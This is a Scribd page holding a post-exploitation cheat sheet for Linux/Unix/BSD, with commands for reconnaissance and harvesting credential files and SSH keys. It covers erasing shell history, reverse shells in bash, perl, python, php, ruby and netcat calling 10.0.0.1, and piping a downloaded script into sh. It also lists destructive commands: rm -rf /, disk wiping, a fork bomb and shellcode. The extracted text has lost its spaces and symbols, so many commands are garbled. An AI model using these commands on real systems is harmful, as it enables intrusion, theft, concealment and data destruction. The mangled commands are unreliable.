Scribd
Upload
368 views

Linux-Unix-BSD Post Exploitation Command List

The document provides a list of commands for Linux/Unix/BSD post-exploitation organized into categories such as "Information", "System", "Networking", "User accounts", "Credentials", "Configs", and "Escalating privileges". It contains over 100 individual commands and their descriptions or purposes for obtaining information from and maintaining access on a compromised system. The document also provides tips for covering tracks and avoiding history logs.

Uploaded by

hardoise
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
368 views

Linux-Unix-BSD Post Exploitation Command List

The document provides a list of commands for Linux/Unix/BSD post-exploitation organized into categories such as "Information", "System", "Networking", "User accounts", "Credentials", "Configs", and "Escalating privileges". It contains over 100 individual commands and their descriptions or purposes for obtaining information from and maintaining access on a compromised system. The document also provides tips for covering tracks and avoiding history logs.

Uploaded by

hardoise
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Linux/Unix/BSDPostExploitation

CommandList
Ifforanyreasonyoucannotaccess/editthesefilesinthefuture,pleasecontact
[email protected]
YoucandownloadthesefilesinanyformatusingGoogleDocs
File>DownloadAsmethod
IfyouareviewingthisonanythingotherthanGoogleDocs,youcanget
accesstothelatestlinkstotheLinux/Unix/BSD,OSX,Obscure,Metasploit,and
Windowsdocshere:http://bit.ly/nuc0N0
DISCLAIMER:Anyonecaneditthesedocs,andallthatentailsandimplies

Linux/Unix/BSDPostExploitationCommandListPage:1

TableofContents
TableofContents
Information
BlindFiles
System
Networking
Useraccounts
Credentials
Configs
DetermineDistro
InstalledPackages
PackageSources
FindingImportantFiles
CoveringYourTracks
Avoidinghistoryfilesmys
Obtainusersinformation
Escalating
Lookingforpossibleopenedpaths
Maintainingcontrol
ReverseShell
FunifWindowsispresentandaccessible
Stufftobesorted
DeletingandDestroying
Executearemotescript
ForkBomb

Linux/Unix/BSDPostExploitationCommandListPage:2

Information
BlindFiles
(thingstopullwhenallyoucandoisblindlyread)LFI/dirtraversal(Dontforget%00!)
File

ContentsandReason

/etc/resolv.conf

Containsthecurrentnameservers(DNS)forthe
system.Thisisagloballyreadablefilethatisless
likelytotriggerIDSalertsthan/etc/passwd

/etc/motd

MessageoftheDay.

/etc/issue

Debiancurrentversionofdistro

/etc/passwd

Listoflocalusers

/etc/shadow

Listofuserspasswordshashes(requiresroot)

/home/xxx/.bash_history

Willgiveyousomedirectorycontext

System
Command

Descriptionand/orReason

unamea

Printsthekernelversion,arch,sometimesdistro,...

psaux

Listallrunningprocesses

topn1d

Printprocess,1isanumberoflines

id

Yourcurrentusername,groups

arch,unamem

Kernelprocessorarchitecture

whoisconnected,uptimeandloadavg

whoa

uptime,runlevel,tty,procesesetc.
Linux/Unix/BSDPostExploitationCommandListPage:3

gccv

ReturnstheversionofGCC.

mysqlversion

ReturnstheversionofMySQL.

perlv

ReturnstheversionofPerl.

rubyv

ReturnstheversionofRuby.

pythonversion

ReturnstheversionofPython.

dfk

mountedfs,size,%use,devandmountpoint[

mount

mountedfs

lasta

Lastusersloggedon

lastcomm
lastlog
lastlogin(BSD)
getenforce

GetthestatusofSELinux(Enforcing,Permissiveor
Disabled)

dmesg

Informationsfromthelastsystemboot

lspci

printsallPCIbusesanddevices

lsusb

printsallUSBbusesanddevices/h

lscpu

printsCPUinformation

lshw
ex
cat/proc/cpuinfo
cat/proc/meminfo
duhmaxdepth=1/

(note:cancauseheavydiski/o)

whichnmap

locateacommand(ienmapornc)

locatebin/nmap
locatebin/nc

Linux/Unix/BSDPostExploitationCommandListPage:4

jpsl
javaversion

ReturnstheversionofJava.

Networking
hostnamef
ipaddrshow
iproshow
ifconfiga
routen
cat/etc/network/interfaces
iptablesLnv
iptablestnatLnv
ip6tablesLnv
iptablessave
netstatanop
netstatr
netstatnltupw(rootwithrawsockets)
arpa
lsofnPi
toresumeitcat/proc/net/*(morediscreet)
whatdoestheabovemean?>Itmeansthatalltheinformationgivenbytheabovecommandscanbe
foundbylookingintothefilesunder/proc/net,andthatthisapproachislesslikelytotriggermonitoring
orotherstuff.

Useraccounts

localaccounts:cat/etc/passwd
passwordhashesin/etc/shadowonLinux
passwordhashesin/etc/security/passwdonAIX
groupsin/etc/group(and/or/etc/gshadowonLinux)
allaccounts:getentpasswd
shoulddumplocal,LDAP,NIS,whateverthesystemisusing
samewithgetentgroup
Sambasowndatabase:pdbeditLworpdbeditLv
privilegedaccounts:cat
(above:cat???)
mailaliases:cat/etc/aliasesfind/etcnamealiases,getentaliases
Linux/Unix/BSDPostExploitationCommandListPage:5

NISaccounts:ypcatpasswddisplaysNISpasswordfile

Credentials

SSHkeys,oftenpasswordless:/home/*/.ssh/id*
SSHagent:

Kerberostickets:/tmp/krb5cc_*,/tmp/krb5.keytab
PGPkeys:/home/*/.gnupg/secring.gpgs

Configs

lsaRl/etc/|awk'$1~/w.$/'|grepvlrwx2>/dev/nullte
cat/etc/issue{,.net}
cat/etc/master.passwd
cat/etc/group
cat/etc/hosts
cat/etc/crontab
cat/etc/sysctl.conf
foruserin$(cutf1d:/etc/passwd)doecho$usercrontabu$userldone#(Listsallcrons)
cat/etc/resolv.conf
cat/etc/syslog.conf
cat/etc/chttp.conf
cat/etc/lighttpd.conf
cat/etc/cups/cupsd.confcda
cat/etc/inetd.conf
cat/opt/lampp/etc/httpd.conf
cat/etc/samba/smb.conf
cat/etc/openldap/ldap.conf
cat/etc/ldap/ldap.conf
cat/etc/exports
cat/etc/auto.master
cat/etc/auto_master
cat/etc/fstab
find/etc/sysconfig/typefexeccat{}\

DetermineDistro

lsb_released
/etc/osrelease
/etc/issue
cat/etc/*release

#GenericcommandforallLSBdistros
#Genericfordistrosusingsystemd
#Genericbutoftenmodified
Linux/Unix/BSDPostExploitationCommandListPage:6

/etc/SUSErelease
/etc/redhatrelease,/etc/redhat_version
/etc/fedorarelease
/etc/slackwarerelease,/etc/slackwareversion
/etc/debian_release,/etc/debian_version
/etc/mandrakerelease
/etc/sunrelease
/etc/release
/etc/gentoorelease
/etc/archrelease
arch
unamea

#NovellSUSE
#RedHat
#Fedora
#Slackware
#Debian
#Mandrake
#SunJDS
#Solaris/Sparc
#Gentoo
#ArchLinux(filewillbeempty)
#OpenBSDsample:OpenBSD.amd64
#oftenhintsatitprettywell

InstalledPackages

rpmqalast|head
yumlist|grepinstalled
Debian:
dpkgl
dpkgl|grepilinuximage
dpkggetselections
{Free,Net}BSD:
pkg_info
Solaris:
pkginfo
Gentoo:
#equerymustbeinstalled
cd/var/db/pkg/&&lsd*/* #alwaysworks
ArchLinux:
pacmanQ

PackageSources

cat/etc/apt/sources.list
lsl/etc/yum.repos.d/
cat/etc/yum.conf

FindingImportantFiles

lsdlR*/#
lsalR|grep^d
find/vartyped
lsdl`find/vartyped`
lsdl`find/vartyped`|grepvroot
find/var!userroottypedls

find/var/logtypefexeclsla{}\
find/perm4000(findallsuidfiles)
Linux/Unix/BSDPostExploitationCommandListPage:7

lsalhtr/mnt
lsalhtr/media
lsalhtr/tmp
lsalhtr/home
cd/home/treels/home/*/.ssh/*
find/hometypefiname'.*history'
lslart/etc/rc.d/
locatetar|grep[.]tar$#Remembertoupdatedbbeforerunninglocate
locatetgz|grep[.]tgz$
locatesql|grep[.]sql$
locatesettings|grep[.]php$
locateconfig.inc|grep[.]php$
ls/home/*/id*
.properties|grep[.]properties#javaconfigfiles
locate.xml|grep[.]xml#java/.netconfigfiles
find/sbin/usr/sbin/opt/lib`echo$PATH|seds/://g`perm/6000ls#findsuids
locaterhosts

CoveringYourTracks
Avoidinghistoryfilesmys

exportHISTFILE=
or
unsetHISTFILE
Thisnextonemightnotbeagoodidea,becausealotoffolksknowtocheckfortamperingwiththisfile,
andwillbesuspiciousiftheyfindout:
Howeverifyouhappentobeonanaccountthatwasoriginallyinaccessible,ifthe.bash_historyfileis
available(lsa~),viewcatingitscontentscanprovideyouwithagooddealofinformationaboutthe
systemanditsmostrecentupdates/changes.
clearallhistoryinram
historyc
rmrf~/.bash_history&&lns~/.bash_history/dev/null(invasive)
touch~/.bash_history(invasive)
<space>historyc(usingaspacebeforeacommand)
zsh%unsetHISTFILEHISTSIZE
tcsh%sethistory=0
bash$set+ohistory
ksh$unsetHISTFILE
find/typefexec{}(forensicsnightmare)
Notethatyoureprobablybetteroffmodifyingortemporarydisablingratherthandeletinghistoryfiles,it
Linux/Unix/BSDPostExploitationCommandListPage:8

leavesalotlesstracesandislesssuspect.
InsomecasesHISTFILEandHISTFILESIZEaremadereadonlygetaroundthisbyexplicitlyclearing
history(historyc)orbykill9$$ingtheshell.Sometimestheshellcanbeconfiguredtorunhistory
waftereverycommandgetaroundthisbyoverridinghistorywithanoopshellfunction.Noneofthis
willhelpiftheshellisconfiguredtologeverythingtosyslog,however.

Obtainusersinformation

lsalh/home/*/
lsalh/home/*/.ssh/
cat/home/*/.ssh/authorized_keys
cat/home/*/.ssh/known_hosts
cat/home/*/.*hist*#youcanlearnalotfromthis
find/home/*/.vnc/home/*/.subversiontypef
grep^ssh/home/*/.*hist*
grep^telnet`/home/*/.*hist*
grep^mysql/home/*/.*hist*
cat/home/*/.viminfo
sudol#ifsudoersisnot.readable,thissometimesworksperuser
crontabl
cat/home/*/.mysql_history

Escalating
Lookingforpossibleopenedpaths

lsalh/root/
sudol
cat/etc/sudoers
cat/etc/shadow
cat/etc/master.passwd#OpenBSD
cat/var/spool/cron/crontabs/*|cat/var/spool/cron/*
lsofnPi

ls/home/*/.ssh/*

Maintainingcontrol
Linux/Unix/BSDPostExploitationCommandListPage:9

ReverseShell
Startinglistsourcedfrom:http://pentestmonkey.net/cheatsheet/shells/reverseshellcheatsheet
bashi>&/dev/tcp/10.0.0.1/80800>&1(No/dev/tcponolderDebians,butusenc,socat,TCL,
awkoranyinterpreterlikePython,andsoon.).
perle'useSocket$i="10.0.0.1"$p=1234socket(S,PF_INET,SOCK_STREAM,
getprotobyname("tcp"))if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S")
open(STDOUT,">&S")open(STDERR,">&S")exec("/bin/shi")}'
pythonc'importsocket,subprocess,oss=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)s.connect(("10.0.0.1",1234))os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","i"])'
phpr'$sock=fsockopen("10.0.0.1",1234)exec("/bin/shi<&3>&32>&3")'
rubyrsockete'f=TCPSocket.open("10.0.0.1",1234).to_iexecsprintf("/bin/shi<&%d>&%d
2>&%d",f,f,f)'nce/bin/sh10.0.0.11234#noteneedlonsomeversions,andmanydoesNOT
supporteanymore
rm/tmp/fmkfifo/tmp/fcat/tmp/f|/bin/shi2>&1|nc10.0.0.11234>/tmp/f
xtermdisplay10.0.0.1:1se
ListenerXnest:1
Addpermissiontoconnectxhost+victimIP
sshNR3333:localhost:22user@yourhost
nce/bin/sh10.0.0.11234

FunifWindowsispresentandaccessible
IfthereisWindowsinstalledandtheloggedinuseraccesslevelincludesthoseWindowspartition,
attackercanmountthemupanddoamuchdeeperinformationgathering,credentialtheftandrooting.
Ntfs3gisusefulformountingntfspartitionsreadwrite.
TODO:insertdetailsonwhattolookfor

Stufftobesorted
##GOINGTOMOVEEVERYTHINGHEREFORLEGIBILITYONCEEDITINGDIESDOWN
Command

Output

psaux

Listofrunningprocesses

id

Listcurrentuserandgroupalongwithuser/groupid

Showinfoaboutwhoislogged,whataretheyaredoing
Linux/Unix/BSDPostExploitationCommandListPage:10

whoa

Printinformationaboutusers

cat/dev/core>
/dev/audio

Makesasoundfromthememorycontent.
Usefulnessofthis???(none,asidefrompissingoffthesysadmin,inthe
veryunlikelycasethattheserverhasspeakersandthelegacyOSSdriver)

cat/dev/mem>
/dev/audio
sudop

allowstheusertodefinewhatthepasswordpromptwillbe
(usefulforfuncustomizationwithaliasesorshellscripts)

DeletingandDestroying
(Ifitisnecessarytoleavethemachineinaccessibleorunusable)
Notethatthistendstobequiteevident(asopposedtoasimpleexploitationthatmightgounnoticedforsometime,
evenforever),andwillmostsurelygetyouintotroubles.
Oh,andyoureprobablyajerkifyouuseanyofthestuffbelow.

Command

Description

rmrf/

Thiswillrecursivelytrytodeleteallfiles.

charesp[]__attribute__((section(.text)))/*e.s.p
Hexversionofrmrf/
release*/=
Howisthissupposedtowork?
\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x00\x2d\x63\x00
cpp/bin/sh/tmp/.beyondchmod4755
/tmp/.beyond

mkfs.ext3/dev/sda

Reformatthedevicementioned,making
recoveryoffileshard.

ddif=/dev/zeroof=/dev/sdabs=1M

Overwritedisk/dev/sdawithzeros

Executearemotescript
wgethttp://server/file.shO|sh

Thiscommandforcesthedownloadofafileand
Linux/Unix/BSDPostExploitationCommandListPage:11

immediatelyitsexecution,canbeexploitedeasily
usingorreverseshit

ForkBomb
:(){:|:&}:

The[in]famous"forkbomb".Thiscommandwill
causeyoursystemtorunalargenumberof
processes,untilit"hangs".Thiscanoftenleadto
dataloss(e.g.iftheuserbrutallyreboots,orthe
OOMkillerkillsaprocesswithunsavedwork).If
leftaloneforenoughtimeasystemcaneventually
recoverfromaforkbomb.

Stolenfrom:http://incolumitas.com/wpcontent/uploads/2012/12/blackhats_view.pdf
World
Findwordwritablefoldersoutsideyourhome
writable
directory.Itwouldbeatremendoussuccessifwe
directories couldwrite,sayto/etc.Sowecouldaddconfiguration
filesandthereforeprettysureexecutecodeasroot,
sincemanydaemonsreadaspecificnumberof
primaryandsecondaryconfigurationfiles,whereas
thesecondaryonesareoftennotcreatedyet.Ifthe
superusershome(/root)wouldbewritable,wecould
createshellstartupfilesthatdoesn'texistyet:.profile,
.bash_profile,.bashrc...

find/\(
wholename
'/home/homedir/*'
prune\)
o\
(
typed
perm
0002\)
exec
ls
ld'{}'''2>/dev/null

World
writable
files

Whatif/etc/passwdwouldbewritable?Yeah,wejust
couldaddanotherrootuserandwewouldhavewon!
Whereastheforegoingscenarioisjusttoogoodtobe
true,itreallymakessensetosearchforworldwritable
filesoutsideyourownterritory(=yourhome
directory).

find/\(
wholename
'/home/homedir/*'
prune
o
wholename'/proc/*'
prune\)
o\(
typef
perm
0002\)
execls
l'{}'''2>/dev/null

Logfiles

Sometimesasecurityunawareadministratorchmods find/var/log
typef
perm
asensitivelogfile,becausehecouldn'tviewitand
00042>/dev/null
thereforeleakspotentiallysensitivedatasuchas
passwordsorotherimportantinformation.

Setuid/
Wealreadyexaminedfullywhysetuidandsetgidfiles find/\(
typef
or
typed\)
setgidfiles areworthtobedoublechecked.Suchafileownedby perm
60002>/dev/null
rootandsusceptibleforattacksisabigweakness.

Linux/Unix/BSDPostExploitationCommandListPage:12

You might also like